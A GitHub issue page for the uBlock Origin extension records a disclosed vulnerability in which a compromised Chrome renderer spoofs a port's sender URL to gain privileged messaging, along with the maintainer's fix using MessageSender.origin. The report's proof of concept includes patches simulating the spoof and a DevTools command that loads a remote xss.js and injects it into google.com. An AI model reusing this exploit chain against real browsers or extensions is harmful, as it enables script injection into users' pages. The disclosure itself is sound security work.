Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Use unspoofable Messenger.origin to determine privilege level of ports #1992

Closed
gorhill opened this issue Feb 17, 2022 · 1 comment
Closed

Use unspoofable Messenger.origin to determine privilege level of ports #1992

gorhill opened this issue Feb 17, 2022 · 1 comment
Labels
fixed issue has been addressed

Comments

@gorhill
Copy link
Member

gorhill commented Feb 17, 2022
edited
Loading

Description

Email received at ubo-security at raymondhill.net on 2022-02-17:

Hi,

I'd like to report a security vulnerability in the uBlock Origin extension.

A compromised renderer process of Chrome is able to spoof the URL of a messaging port and send privileged messages.

A compromised renderer process can spoof the 'MessageSender.url' in a chrome.runtime.onConnect listener[1][2]. 'vAPI.messaging.onPortConnect' uses 'sender.url' to determine whether the port is privileged (https://github.com/gorhill/uBlock/blob/3154ed1bac227e4bc683c919d8d10bd01c9f8bb6/platform/common/vapi-background.js#L857-L861). As a result, a compromised renderer can spoof the URL to an extension URL and perform sensitive actions.

For instance, it can set 'userResourcesLocation' and add a custom filter to perform XSS.

[1] https://chromium.googlesource.com/chromium/src/+/refs/heads/main/docs/security/compromised-renderers.md
[2] https://developer.chrome.com/docs/extensions/mv3/security/#content_scripts

  • Affected browser versions
    All Chrome including 98 (stable) to 101

  • PoC

  1. To simulate a compromised renderer, the following patch can be applied to Chromium:
diff --git a/extensions/renderer/ipc_message_sender.cc b/extensions/renderer/ipc_message_sender.cc
index 5e25676cbcb..5e7436c28d6 100644
--- a/extensions/renderer/ipc_message_sender.cc
+++ b/extensions/renderer/ipc_message_sender.cc
@@ -154,6 +154,9 @@ class MainThreadIPCMessageSender : public IPCMessageSender {
         }
         info.target_id = *target.extension_id;
         info.source_url = script_context->url();
+        if (info.source_url.host() == "example.com") {
+          info.source_url = GURL("chrome-extension://cjpalhdlnbpafiamejdnhcphjbkeiagm/");
+        }
 
         TRACE_RENDERER_EXTENSION_EVENT(
             "MainThreadIPCMessageSender::SendOpenMessageChannel/extension",

or the following patch to the uBlock Origin extension:

diff --git a/platform/common/vapi-background.js b/platform/common/vapi-background.js
index 0d3cc584e..90e7c7089 100644
--- a/platform/common/vapi-background.js
+++ b/platform/common/vapi-background.js
@@ -855,7 +855,11 @@ vAPI.messaging = {
         );
         const portDetails = { port };
         const sender = port.sender;
-        const { tab, url } = sender;
+        const { tab } = sender;
+        let { url } = sender;
+        if (url.indexOf("example.com") !== -1) {
+            url = "chrome-extension://cjpalhdlnbpafiamejdnhcphjbkeiagm/";
+        }
         portDetails.frameId = sender.frameId;
         portDetails.frameURL = url;
         portDetails.privileged = url.startsWith(this.PRIVILEGED_URL);
  1. Install uBlock Origin extension (https://chrome.google.com/webstore/detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm).
  2. Visit https://example.com and open DevTools.
  3. To simulate a compromised renderer, change the JavaScript context to uBlock Origin and run 'await vAPI.messaging.send("dashboard", {what: "writeHiddenSettings", content: "userResourcesLocation https://gist.githubusercontent.com/ylemkimon/c722fc2dc8510734a169d272aa116a6a/raw/1b04a075104aa27dbcaae13bd7e0ba0ef0f633ab/xss.js"}); await vAPI.messaging.send("dashboard", {what: "createUserFilter", filters: "google.com##+js(xss.js)"});'.
  4. Visit https://google.com and observe that an alert with the 'document.domain' is shown.

Best regards,
Young Min Kim

——
Young Min Kim
CompSec Lab, Seoul National University

uBlock Origin version

1.40.2

Browser name and version

All Chrome including 98 (stable) to 101

Operating System and version

Irrelevant
gorhill added a commit to gorhill/uBlock that referenced this issue Feb 17, 2022
@gorhill
Use unspoofable Messenger.origin to determine privilege level of ports
e1e2ba3 
Related issue:
- uBlockOrigin/uBlock-issues#1992
gorhill added a commit to gorhill/uBlock that referenced this issue Feb 18, 2022
@gorhill
Minor code review
60072e7 
Related issue:
- uBlockOrigin/uBlock-issues#1992
@uBlock-user uBlock-user added the TODO todo label Feb 28, 2022
@gorhill gorhill closed this as completed Mar 3, 2022
@gorhill gorhill added fixed issue has been addressed and removed TODO todo labels Mar 3, 2022
@gorhill gorhill changed the title Placeholder for issue to be filled later Use unspoofable Messenger.origin to determine privilege level of ports Mar 3, 2022
@gorhill
Copy link
Member Author

gorhill commented Mar 3, 2022

Related to #710, it turns out MessageSender.url can't be trusted as I had assumed, MessageSender.origin however can be trusted.

@Imna1975 Imna1975 mentioned this issue Sep 3, 2022
Closed
8 tasks
mneunomne pushed a commit to mneunomne/AdNauseam that referenced this issue Sep 16, 2022
@gorhill
Use unspoofable Messenger.origin to determine privilege level of ports
f7d2d0e 
Related issue:
- uBlockOrigin/uBlock-issues#1992
mneunomne pushed a commit to mneunomne/AdNauseam that referenced this issue Sep 16, 2022
@gorhill
Minor code review
ae28308 
Related issue:
- uBlockOrigin/uBlock-issues#1992
@bumi bumi mentioned this issue Jun 14, 2023
Merged
3 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
fixed issue has been addressed
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@gorhill @uBlock-user